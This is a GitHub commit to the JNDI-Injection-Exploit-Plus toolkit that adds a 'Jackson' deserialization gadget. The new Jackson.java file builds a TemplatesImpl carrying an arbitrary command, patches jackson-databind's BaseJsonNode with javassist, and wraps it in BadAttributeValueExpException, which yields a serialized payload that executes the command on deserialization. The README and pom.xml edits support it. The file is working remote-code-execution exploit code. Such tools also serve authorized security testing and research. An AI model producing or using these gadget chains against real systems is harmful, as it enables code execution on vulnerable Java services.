Skip to content

Commit 26d99d6

Browse files
cckuailongcckuailong
committed
add jackson
1 parent a1e5101 commit 26d99d6

File tree

5 files changed

+59
-3
lines changed

5 files changed

+59
-3
lines changed

README.md

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
3535
Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
3636
Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
3737

38-
#### 3. Deserailization Gadget (total: 73)
38+
#### 3. Deserailization Gadget (total: 74)
3939

4040
P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
4141

@@ -78,6 +78,7 @@ FileUpload1 |@mbechler |commons-fileupload:1.3.1, comm
7878
Groovy1 |@frohoff |groovy:2.3.9
7979
Hibernate1 |@mbechler|
8080
Hibernate2 |@mbechler|
81+
Jackson :arrow_up: |@y4er |com.fasterxml.jackson.core:jackson-databind:2.14.2
8182
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
8283
Jdk7u21 |@frohoff|
8384
JRMPClient1 |@mbechler|

README_zh.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目
1212

1313
- 远程Reference链 (3种)
1414
- 本地Reference链 (4种)
15-
- 反序列化链(73种
15+
- 反序列化链(74种
1616

1717
P.S. 具体利用链名称及依赖见 [表格](./README.md)
1818

pom.xml

Lines changed: 7 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66

77
<groupId>cckuailong</groupId>
88
<artifactId>JNDI-Injection-Exploit-Plus</artifactId>
9-
<version>2.1-SNAPSHOT</version>
9+
<version>2.2-SNAPSHOT</version>
1010

1111
<properties>
1212
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -152,6 +152,12 @@
152152
<version>4.0</version>
153153
</dependency>
154154

155+
<dependency>
156+
<groupId>com.fasterxml.jackson.core</groupId>
157+
<artifactId>jackson-databind</artifactId>
158+
<version>2.14.2</version>
159+
</dependency>
160+
155161
<dependency>
156162
<groupId>org.aspectj</groupId>
157163
<artifactId>aspectjweaver</artifactId>

src/main/java/payloads/Jackson.java

Lines changed: 48 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,48 @@
1+
package payloads;
2+
import com.fasterxml.jackson.databind.node.POJONode;
3+
import javassist.ClassPool;
4+
import javassist.CtClass;
5+
import javassist.CtMethod;
6+
import payloads.annotation.Authors;
7+
import payloads.annotation.Dependencies;
8+
import util.Gadgets;
9+
import util.PayloadRunner;
10+
import util.Reflections;
11+
12+
import javax.management.BadAttributeValueExpException;
13+
import java.util.HashMap;
14+
15+
@SuppressWarnings({"rawtypes", "unchecked"})
16+
@Dependencies({"com.fasterxml.jackson.core:jackson-databind:2.14.2"})
17+
@Authors({Authors.Y4ER})
18+
public class Jackson implements ObjectPayload<Object> {
19+
20+
public Object getObject(final String command) throws Exception {
21+
final Object template = Gadgets.createTemplatesImpl(command);
22+
23+
CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");
24+
CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
25+
ctClass.removeMethod(writeReplace);
26+
// 将修改后的CtClass加载至当前线程的上下文类加载器中
27+
ctClass.toClass();
28+
29+
POJONode node = new POJONode(template);
30+
31+
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
32+
Reflections.setFieldValue(badAttributeValueExpException, "val", node);
33+
34+
HashMap hashMap = new HashMap();
35+
hashMap.put(template, badAttributeValueExpException);
36+
37+
return hashMap;
38+
}
39+
40+
41+
public static byte[] getBytes(final String command) throws Exception {
42+
return PayloadRunner.run(Jackson.class, command);
43+
}
44+
45+
public static void main(final String command) throws Exception {
46+
PayloadRunner.run(Jackson.class, command);
47+
}
48+
}

src/main/java/payloads/annotation/Authors.java

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -29,6 +29,7 @@
2929
String FIREBASKY = "Firebasky";
3030
String CCKUAILONG = "cckuailong";
3131
String YULEGEYU = "yulegeyu";
32+
String Y4ER = "y4er";
3233

3334
String[] value() default {};
3435

0 commit comments

Comments
 (0)